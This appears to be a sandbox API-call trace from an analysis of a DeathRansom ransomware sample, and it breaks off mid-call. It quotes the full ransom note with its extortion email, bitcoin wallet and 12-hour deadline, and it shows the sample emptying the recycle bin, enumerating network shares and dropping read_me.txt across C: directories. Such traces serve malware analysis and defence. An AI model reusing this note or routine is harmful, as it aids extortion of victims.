0x4f40ef8 [0061.315] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: %s\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 989 [0061.315] GetProcessHeap () returned 0x4f10000 [0061.315] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x6b7) returned 0x4f55310 [0061.315] wnsprintfA (in: pszDest=0x4f55310, cchDest=1719, pszFmt="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: %s\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/" | out: pszDest="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: ju9lcFFu56zzLExlZx2cW2ifvxjwfbgwyzul9UBh/BgA3e0IUwZylsyIN9LIO88Tk9b+qSwE8ly+hYxfwQRuemJp8GfcNEpY+aCIUm7NIZewRCyih6eYdUhNDvy3UIFyuYI2leSmGPcDOKXHUY1DxgtKJLdpGHolZYsmMjCSpJqg26CuWE4j975Lg4j5TG7TmV90Mf4Q9KxLGOFHnf0y8Be88DxVi4DSpUG61OVik5NPAUCsr44mft0DSiiDG6lkmMTK8rz/ZXQFplgDjlkFWIjCmJ8z/lzRBeQSGDXHajcXVhm7ole6fDlmmLAqc8JiPF6GJWiXRyC88p/XdmIEM1hyfaUTsIagp3Z4Jcar2Z6fNEN4HOQX4vh70F5mvDA9tNlQ4IGw0HHnAIsio7+XP6C5ESJpCTA56BqT+iYkjiLWnx7aCdkdjLS5GXmyqZwkpJ2pfidiGRAY+K/b4sr6MYxpq3HIsa4yilXCKU6g7nVzaLyRx9Mju7nqi4VzJmsae+7WaeW1JJWG6fDQQDKJ06UcNxKog4qqaFM0hQMpq8DSx8s2ekea+VNJR2RC3KxqGd5vnzP2ko6nan8bbGjQarI0/HCYwMv6YfEg3sQI9Ml0eGAiE54mxl0SQ46Y2c6qJQ8uWWkTrGHfyNeXzJtP1eKU1589G/XMM1nl46l26WpopWGz7EE5WhXprnpvZl+dWoJiaG1pxvThCNWoTFArWQ==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0061.315] GetProcessHeap () returned 0x4f10000 [0061.315] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d0dc28 | out: hHeap=0x4f10000) returned 1 [0061.315] RegCloseKey (hKey=0x608) returned 0x0 [0061.318] SHEmptyRecycleBinA (hwnd=0x0, pszRootPath=0x0, dwFlags=0x1) returned 0x8000ffff [0061.914] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x13, lpNetResource=0x0, lphEnum=0x17e438 | out: lphEnum=0x17e438*=0x7cfe768) returned 0x0 [0062.327] GetProcessHeap () returned 0x4f10000 [0062.327] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4000) returned 0x7d74368 [0062.328] WNetEnumResourceW (in: hEnum=0x7cfe768, lpcCount=0x17e440, lpBuffer=0x7d74368, lpBufferSize=0x17e43c | out: lpcCount=0x17e440, lpBuffer=0x7d74368, lpBufferSize=0x17e43c) returned 0x0 [0062.328] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x13, lpNetResource=0x7d74368, lphEnum=0x17e410 | out: lphEnum=0x17e410*=0x7d20fa0) returned 0x0 [0062.331] GetProcessHeap () returned 0x4f10000 [0062.331] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4000) returned 0x7d79b78 [0062.332] WNetEnumResourceW (in: hEnum=0x7d20fa0, lpcCount=0x17e418, lpBuffer=0x7d79b78, lpBufferSize=0x17e414 | out: lpcCount=0x17e418, lpBuffer=0x7d79b78, lpBufferSize=0x17e414) returned 0x103 [0062.332] GetProcessHeap () returned 0x4f10000 [0062.332] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d79b78 | out: hHeap=0x4f10000) returned 1 [0062.332] WNetCloseEnum (hEnum=0x7d20fa0) returned 0x0 [0062.332] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x13, lpNetResource=0x7d74388, lphEnum=0x17e410 | out: lphEnum=0x17e410*=0x7d20fa0) returned 0x4b8 [0074.858] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x13, lpNetResource=0x7d743a8, lphEnum=0x17e410 | out: lphEnum=0x17e410*=0x7d20fa0) returned 0x4c6 [0074.860] WNetEnumResourceW (in: hEnum=0x7cfe768, lpcCount=0x17e440, lpBuffer=0x7d74368, lpBufferSize=0x17e43c | out: lpcCount=0x17e440, lpBuffer=0x7d74368, lpBufferSize=0x17e43c) returned 0x103 [0074.860] GetProcessHeap () returned 0x4f10000 [0074.860] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d74368 | out: hHeap=0x4f10000) returned 1 [0074.860] WNetCloseEnum (hEnum=0x7cfe768) returned 0x0 [0074.860] GetLogicalDriveStringsW (in: nBufferLength=0x7fff, lpBuffer=0x17e570 | out: lpBuffer="C:\\") returned 0x4 [0074.860] GetProcessHeap () returned 0x4f10000 [0074.860] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8a80048 [0074.862] wnsprintfW (in: pszDest=0x8a80048, cchDest=32767, pszFmt="\\\\?\\%c:" | out: pszDest="\\\\?\\C:") returned 6 [0074.862] GetProcessHeap () returned 0x4f10000 [0074.862] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8a90050 [0074.863] lstrcpyW (in: lpString1=0x8a90050, lpString2="\\\\?\\C:" | out: lpString1="\\\\?\\C:") returned="\\\\?\\C:" [0074.863] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 0 [0074.863] QueueUserWorkItem (Function=0x40a710, Context=0x8a90050, Flags=0x0) returned 1 [0074.863] GetProcessHeap () returned 0x4f10000 [0074.863] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8aa0058 [0074.864] wnsprintfW (in: pszDest=0x8aa0058, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\*") returned 8 [0074.864] FindFirstFileW (in: lpFileName="\\\\?\\C:\\*", lpFindFileData=0x17e1e8 | out: lpFindFileData=0x17e1e8*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4f8a8c0, dwReserved1=0x17e230, cFileName="$Recycle.Bin", cAlternateFileName="")) returned 0x7cfe768 [0074.864] wnsprintfW (in: pszDest=0x8aa0058, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\$Recycle.Bin") returned 19 [0074.864] lstrcmpW (lpString1="$Recycle.Bin", lpString2="..") returned -1 [0074.864] lstrcmpW (lpString1="$Recycle.Bin", lpString2=".") returned -1 [0074.864] StrStrW (lpFirst="$recycle.bin", lpSrch="programdata") returned 0x0 [0074.864] StrStrW (lpFirst="$recycle.bin", lpSrch="$recycle.bin") returned="$recycle.bin" [0074.864] FindNextFileW (in: hFindFile=0x7cfe768, lpFindFileData=0x17e1e8 | out: lpFindFileData=0x17e1e8*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4f8a8c0, dwReserved1=0x17e230, cFileName="Boot", cAlternateFileName="")) returned 1 [0074.864] wnsprintfW (in: pszDest=0x8aa0058, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot") returned 11 [0074.864] lstrcmpW (lpString1="Boot", lpString2="..") returned 1 [0074.864] lstrcmpW (lpString1="Boot", lpString2=".") returned 1 [0074.864] StrStrW (lpFirst="boot", lpSrch="programdata") returned 0x0 [0074.864] StrStrW (lpFirst="boot", lpSrch="$recycle.bin") returned 0x0 [0074.864] StrStrW (lpFirst="boot", lpSrch="program files") returned 0x0 [0074.864] StrStrW (lpFirst="boot", lpSrch="windows") returned 0x0 [0074.864] StrStrW (lpFirst="boot", lpSrch="all users") returned 0x0 [0074.865] StrStrW (lpFirst="boot", lpSrch="appdata") returned 0x0 [0074.865] GetProcessHeap () returned 0x4f10000 [0074.865] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8ab0060 [0074.865] lstrcpyW (in: lpString1=0x8ab0060, lpString2="\\\\?\\C:\\Boot" | out: lpString1="\\\\?\\C:\\Boot") returned="\\\\?\\C:\\Boot" [0074.865] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 1 [0074.865] QueueUserWorkItem (Function=0x40a710, Context=0x8ab0060, Flags=0x0) returned 1 [0074.865] GetProcessHeap () returned 0x4f10000 [0074.865] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8ac0068 [0074.866] wnsprintfW (in: pszDest=0x8ac0068, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\*") returned 13 [0074.866] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\*", lpFindFileData=0x17df70 | out: lpFindFileData=0x17df70*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName=".", cAlternateFileName="")) returned 0x7cfe8e8 [0074.866] wnsprintfW (in: pszDest=0x8ac0068, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\.") returned 13 [0074.866] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0074.866] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0074.866] FindNextFileW (in: hFindFile=0x7cfe8e8, lpFindFileData=0x17df70 | out: lpFindFileData=0x17df70*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="..", cAlternateFileName="")) returned 1 [0074.866] wnsprintfW (in: pszDest=0x8ac0068, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\..") returned 14 [0074.866] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0074.866] FindNextFileW (in: hFindFile=0x7cfe8e8, lpFindFileData=0x17df70 | out: lpFindFileData=0x17df70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac2e8a60, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x2ebf9340, ftLastAccessTime.dwHighDateTime=0x1d4d597, ftLastWriteTime.dwLowDateTime=0x2ebf9340, ftLastWriteTime.dwHighDateTime=0x1d4d597, nFileSizeHigh=0x0, nFileSizeLow=0x6000, dwReserved0=0x0, dwReserved1=0x240000, cFileName="BCD", cAlternateFileName="")) returned 1 [0074.867] wnsprintfW (in: pszDest=0x8ac0068, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\BCD") returned 15 [0074.867] FindNextFileW (in: hFindFile=0x7cfe8e8, lpFindFileData=0x17df70 | out: lpFindFileData=0x17df70*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac2e8a60, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac2e8a60, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x469b3b00, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0x5400, dwReserved0=0x0, dwReserved1=0x240000, cFileName="BCD.LOG", cAlternateFileName="")) returned 1 [0074.867] wnsprintfW (in: pszDest=0x8ac0068, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\BCD.LOG") returned 19 [0074.867] FindNextFileW (in: hFindFile=0x7cfe8e8, lpFindFileData=0x17df70 | out: lpFindFileData=0x17df70*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac30ebc0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="BCD.LOG1", cAlternateFileName="BCD~1.LOG")) returned 1 [0074.867] wnsprintfW (in: pszDest=0x8ac0068, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\BCD.LOG1") returned 20 [0074.867] FindNextFileW (in: hFindFile=0x7cfe8e8, lpFindFileData=0x17df70 | out: lpFindFileData=0x17df70*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac30ebc0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="BCD.LOG2", cAlternateFileName="BCD~2.LOG")) returned 1 [0074.867] wnsprintfW (in: pszDest=0x8ac0068, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\BCD.LOG2") returned 20 [0074.867] FindNextFileW (in: hFindFile=0x7cfe8e8, lpFindFileData=0x17df70 | out: lpFindFileData=0x17df70*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0x0, dwReserved1=0x240000, cFileName="BOOTSTAT.DAT", cAlternateFileName="")) returned 1 [0074.867] wnsprintfW (in: pszDest=0x8ac0068, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\BOOTSTAT.DAT") returned 24 [0074.867] FindNextFileW (in: hFindFile=0x7cfe8e8, lpFindFileData=0x17df70 | out: lpFindFileData=0x17df70*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac015040, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="cs-CZ", cAlternateFileName="")) returned 1 [0074.867] wnsprintfW (in: pszDest=0x8ac0068, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\cs-CZ") returned 17 [0074.867] lstrcmpW (lpString1="cs-CZ", lpString2="..") returned 1 [0074.867] lstrcmpW (lpString1="cs-CZ", lpString2=".") returned 1 [0074.867] StrStrW (lpFirst="cs-cz", lpSrch="programdata") returned 0x0 [0074.867] StrStrW (lpFirst="cs-cz", lpSrch="$recycle.bin") returned 0x0 [0074.867] StrStrW (lpFirst="cs-cz", lpSrch="program files") returned 0x0 [0074.867] StrStrW (lpFirst="cs-cz", lpSrch="windows") returned 0x0 [0074.867] StrStrW (lpFirst="cs-cz", lpSrch="all users") returned 0x0 [0074.867] StrStrW (lpFirst="cs-cz", lpSrch="appdata") returned 0x0 [0074.867] GetProcessHeap () returned 0x4f10000 [0074.867] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8ad0070 [0074.868] lstrcpyW (in: lpString1=0x8ad0070, lpString2="\\\\?\\C:\\Boot\\cs-CZ" | out: lpString1="\\\\?\\C:\\Boot\\cs-CZ") returned="\\\\?\\C:\\Boot\\cs-CZ" [0074.868] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 2 [0074.868] QueueUserWorkItem (Function=0x40a710, Context=0x8ad0070, Flags=0x0) returned 1 [0074.868] GetProcessHeap () returned 0x4f10000 [0074.868] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8ae0078 [0074.869] wnsprintfW (in: pszDest=0x8ae0078, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\cs-CZ\\*") returned 19 [0074.869] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\cs-CZ\\*", lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac015040, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x7cfe928 [0074.881] wnsprintfW (in: pszDest=0x8ae0078, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\cs-CZ\\.") returned 19 [0074.881] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0074.881] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0074.881] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac015040, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0074.881] wnsprintfW (in: pszDest=0x8ae0078, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\cs-CZ\\..") returned 20 [0074.881] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0074.881] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c50, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0074.881] wnsprintfW (in: pszDest=0x8ae0078, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 33 [0074.881] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c50, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0074.881] FindClose (in: hFindFile=0x7cfe928 | out: hFindFile=0x7cfe928) returned 1 [0074.882] wnsprintfW (in: pszDest=0x8ae0078, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Boot\\cs-CZ\\read_me.txt") returned 29 [0074.882] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\cs-CZ\\read_me.txt" (normalized: "c:\\boot\\cs-cz\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x79c [0074.882] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: ju9lcFFu56zzLExlZx2cW2ifvxjwfbgwyzul9UBh/BgA3e0IUwZylsyIN9LIO88Tk9b+qSwE8ly+hYxfwQRuemJp8GfcNEpY+aCIUm7NIZewRCyih6eYdUhNDvy3UIFyuYI2leSmGPcDOKXHUY1DxgtKJLdpGHolZYsmMjCSpJqg26CuWE4j975Lg4j5TG7TmV90Mf4Q9KxLGOFHnf0y8Be88DxVi4DSpUG61OVik5NPAUCsr44mft0DSiiDG6lkmMTK8rz/ZXQFplgDjlkFWIjCmJ8z/lzRBeQSGDXHajcXVhm7ole6fDlmmLAqc8JiPF6GJWiXRyC88p/XdmIEM1hyfaUTsIagp3Z4Jcar2Z6fNEN4HOQX4vh70F5mvDA9tNlQ4IGw0HHnAIsio7+XP6C5ESJpCTA56BqT+iYkjiLWnx7aCdkdjLS5GXmyqZwkpJ2pfidiGRAY+K/b4sr6MYxpq3HIsa4yilXCKU6g7nVzaLyRx9Mju7nqi4VzJmsae+7WaeW1JJWG6fDQQDKJ06UcNxKog4qqaFM0hQMpq8DSx8s2ekea+VNJR2RC3KxqGd5vnzP2ko6nan8bbGjQarI0/HCYwMv6YfEg3sQI9Ml0eGAiE54mxl0SQ46Y2c6qJQ8uWWkTrGHfyNeXzJtP1eKU1589G/XMM1nl46l26WpopWGz7EE5WhXprnpvZl+dWoJiaG1pxvThCNWoTFArWQ==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0074.882] WriteFile (in: hFile=0x79c, lpBuffer=0x4f55310*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17df5c, lpOverlapped=0x0 | out: lpBuffer=0x4f55310*, lpNumberOfBytesWritten=0x17df5c*=0x6b3, lpOverlapped=0x0) returned 1 [0074.883] CloseHandle (hObject=0x79c) returned 1 [0074.884] GetProcessHeap () returned 0x4f10000 [0074.884] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8ae0078 | out: hHeap=0x4f10000) returned 1 [0074.884] FindNextFileW (in: hFindFile=0x7cfe8e8, lpFindFileData=0x17df70 | out: lpFindFileData=0x17df70*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="da-DK", cAlternateFileName="")) returned 1 [0074.884] wnsprintfW (in: pszDest=0x8ac0068, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\da-DK") returned 17 [0074.884] lstrcmpW (lpString1="da-DK", lpString2="..") returned 1 [0074.884] lstrcmpW (lpString1="da-DK", lpString2=".") returned 1 [0074.884] StrStrW (lpFirst="da-dk", lpSrch="programdata") returned 0x0 [0074.884] StrStrW (lpFirst="da-dk", lpSrch="$recycle.bin") returned 0x0 [0074.884] StrStrW (lpFirst="da-dk", lpSrch="program files") returned 0x0 [0074.884] StrStrW (lpFirst="da-dk", lpSrch="windows") returned 0x0 [0074.884] StrStrW (lpFirst="da-dk", lpSrch="all users") returned 0x0 [0074.885] StrStrW (lpFirst="da-dk", lpSrch="appdata") returned 0x0 [0074.885] GetProcessHeap () returned 0x4f10000 [0074.885] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8a90050 [0074.885] lstrcpyW (in: lpString1=0x8a90050, lpString2="\\\\?\\C:\\Boot\\da-DK" | out: lpString1="\\\\?\\C:\\Boot\\da-DK") returned="\\\\?\\C:\\Boot\\da-DK" [0074.885] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 3 [0074.885] QueueUserWorkItem (Function=0x40a710, Context=0x8a90050, Flags=0x0) returned 1 [0074.885] GetProcessHeap () returned 0x4f10000 [0074.885] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8ae0078 [0074.885] wnsprintfW (in: pszDest=0x8ae0078, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\da-DK\\*") returned 19 [0074.885] FindFirstFileW (in: 